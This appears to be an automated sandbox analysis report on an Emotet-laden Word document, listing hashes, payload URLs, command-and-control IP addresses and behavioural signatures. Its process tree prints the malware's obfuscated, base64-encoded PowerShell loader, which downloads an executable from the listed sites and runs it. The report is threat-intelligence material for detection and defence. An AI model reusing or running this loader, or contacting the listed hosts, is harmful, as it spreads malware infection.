Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
29-07-2020 07:17
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc
Resource
win7
General
-
Target
emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc
-
Size
172KB
-
MD5
2e5604fc710cb5f7d0802eed16d9974b
-
SHA1
1d3b14e0647a32071714a9c318e7ba88fcac9b36
-
SHA256
7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9
-
SHA512
58104d7c98bd3dcaf7d32b8ab75c3051ba1ce631f38e84ad5dba74319d364d88f9d9efafb54508ea7dbf9812af4dce2a5dc2ab61f74dd2b6d04a7e5d8df7056e
Malware Config
Extracted
http://eldridgelondon.com/wp-admin/QS/
http://empmtg.com/guestbook/uQ4qC339/
http://elisent.com/assets/ReH6966/
http://elifmakina.net/ww4w/WnRLv/
http://eliteseobusiness.com/takeout.eliteseobusiness.com/GYa538680/
Extracted
emotet
179.60.229.168:443
185.94.252.13:443
189.218.165.63:80
77.90.136.129:8080
217.199.160.224:7080
104.131.41.185:8080
2.47.112.152:80
185.94.252.27:443
186.250.52.226:8080
51.255.165.160:8080
68.183.170.114:8080
191.99.160.58:80
104.131.103.37:8080
181.31.211.181:80
202.62.39.111:80
83.169.21.32:7080
87.106.46.107:8080
72.47.248.48:7080
177.75.143.112:443
190.17.195.202:80
137.74.106.111:7080
181.129.96.162:8080
82.196.15.205:8080
61.92.159.208:8080
190.6.193.152:8080
181.167.96.215:80
143.0.87.101:80
12.162.84.2:8080
212.71.237.140:8080
217.13.106.14:8080
46.214.11.172:80
114.109.179.60:80
89.32.150.160:8080
185.94.252.12:80
177.72.13.80:80
192.241.146.84:8080
189.1.185.98:8080
187.106.41.99:80
219.92.13.25:80
181.30.69.50:80
68.183.190.199:8080
212.231.60.98:80
190.181.235.46:80
157.7.199.53:8080
178.79.163.131:8080
77.55.211.77:8080
204.225.249.100:7080
170.81.48.2:80
104.236.161.64:8080
5.196.35.138:7080
190.194.242.254:443
50.28.51.143:8080
187.162.248.237:80
46.28.111.142:7080
70.32.84.74:8080
203.25.159.3:8080
190.163.31.26:80
177.144.135.2:80
177.73.0.98:443
177.139.131.143:443
177.74.228.34:80
191.182.6.118:80
94.176.234.118:443
45.161.242.102:80
149.62.173.247:8080
144.139.91.187:443
181.120.79.227:80
80.249.176.206:80
71.50.31.38:80
172.104.169.32:8080
192.241.143.52:8080
111.67.12.221:8080
190.96.118.251:443
186.70.127.199:8090
190.147.137.153:443
177.66.190.130:80
70.32.115.157:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2980 1724 powersheLL.exe 68 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2980 powersheLL.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3812 wrote to memory of 1136 3812 903.exe 78 PID 3812 wrote to memory of 1136 3812 903.exe 78 PID 3812 wrote to memory of 1136 3812 903.exe 78 -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\winhttp\mycomput.exe 903.exe -
Executes dropped EXE 2 IoCs
pid Process 3812 903.exe 1136 mycomput.exe -
Emotet Payload 2 IoCs
Detects Emotet payload in memory.
resource yara_rule behavioral2/memory/3812-6-0x0000000000650000-0x000000000065C000-memory.dmp emotet behavioral2/memory/1136-9-0x0000000001FE0000-0x0000000001FEC000-memory.dmp emotet -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 2584 WINWORD.EXE 2584 WINWORD.EXE 2584 WINWORD.EXE 2584 WINWORD.EXE 2584 WINWORD.EXE 2584 WINWORD.EXE 2584 WINWORD.EXE 2584 WINWORD.EXE 2584 WINWORD.EXE 3812 903.exe 3812 903.exe 1136 mycomput.exe 1136 mycomput.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2584 WINWORD.EXE 2584 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2980 powersheLL.exe 2980 powersheLL.exe 2980 powersheLL.exe 1136 mycomput.exe 1136 mycomput.exe 1136 mycomput.exe 1136 mycomput.exe 1136 mycomput.exe 1136 mycomput.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 28 2980 powersheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:2584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABOAFYARgBLAEwAdQB6AGcAPQAnAEoAUQBQAEkASgBiAHYAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAYABVAFIAYABpAHQAWQBQAFIATwBUAG8AQwBgAE8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFAAUwBVAEMAVAB6AGMAZAAgAD0AIAAnADkAMAAzACcAOwAkAFcAWABDAEQAWgBwAHMAbgA9ACcATABHAFoAUQBTAG8AZQBvACcAOwAkAEQASABFAEMAUwBpAG0AeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABTAFUAQwBUAHoAYwBkACsAJwAuAGUAeABlACcAOwAkAFMAVwBLAEQATAB0AGMAaQA9ACcASABJAFMARwBPAGIAawBnACcAOwAkAEoATABEAEIATABpAGkAZgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQAWQBRAEwAUQBZAGcAaQBnAD0AJwBoAHQAdABwADoALwAvAGUAbABkAHIAaQBkAGcAZQBsAG8AbgBkAG8AbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AUQBTAC8AKgBoAHQAdABwADoALwAvAGUAbQBwAG0AdABnAC4AYwBvAG0ALwBnAHUAZQBzAHQAYgBvAG8AawAvAHUAUQA0AHEAQwAzADMAOQAvACoAaAB0AHQAcAA6AC8ALwBlAGwAaQBzAGUAbgB0AC4AYwBvAG0ALwBhAHMAcwBlAHQAcwAvAFIAZQBIADYAOQA2ADYALwAqAGgAdAB0AHAAOgAvAC8AZQBsAGkAZgBtAGEAawBpAG4AYQAuAG4AZQB0AC8AdwB3ADQAdwAvAFcAbgBSAEwAdgAvACoAaAB0AHQAcAA6AC8ALwBlAGwAaQB0AGUAcwBlAG8AYgB1AHMAaQBuAGUAcwBzAC4AYwBvAG0ALwB0AGEAawBlAG8AdQB0AC4AZQBsAGkAdABlAHMAZQBvAGIAdQBzAGkAbgBlAHMAcwAuAGMAbwBtAC8ARwBZAGEANQAzADgANgA4ADAALwAnAC4AIgBTAGAAUABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAUwBHAFYAUwBnAHgAdgA9ACcASwBBAFcAVABFAG0AcABtACcAOwBmAG8AcgBlAGEAYwBoACgAJABOAFoAWQBUAFYAdgByAGsAIABpAG4AIAAkAFkAUQBMAFEAWQBnAGkAZwApAHsAdAByAHkAewAkAEoATABEAEIATABpAGkAZgAuACIARABPAHcAbgBgAGwAbwBBAEQAZgBgAEkAYABMAEUAIgAoACQATgBaAFkAVABWAHYAcgBrACwAIAAkAEQASABFAEMAUwBpAG0AeQApADsAJABIAFQATABKAEIAcgBuAGwAPQAnAEkARQBSAFgARgBsAGYAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEQASABFAEMAUwBpAG0AeQApAC4AIgBsAGAARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA3ADMANwAwACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBFAGAAQQB0AEUAIgAoACQARABIAEUAQwBTAGkAbQB5ACkAOwAkAFgARABFAEYAUQBqAHMAaQA9ACcATgBFAEcAUgBDAGEAZABuACcAOwBiAHIAZQBhAGsAOwAkAEIAUQBPAEkASABiAG8AcgA9ACcATQBWAEwATwBLAHEAbwBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQATgBWAFoASgBpAGkAeAA9ACcAQwBNAFAAWABCAHkAaABzACcA1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:2980
-
C:\Users\Admin\903.exeC:\Users\Admin\903.exe1⤵
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3812 -
C:\Windows\SysWOW64\winhttp\mycomput.exe"C:\Windows\SysWOW64\winhttp\mycomput.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
PID:1136
-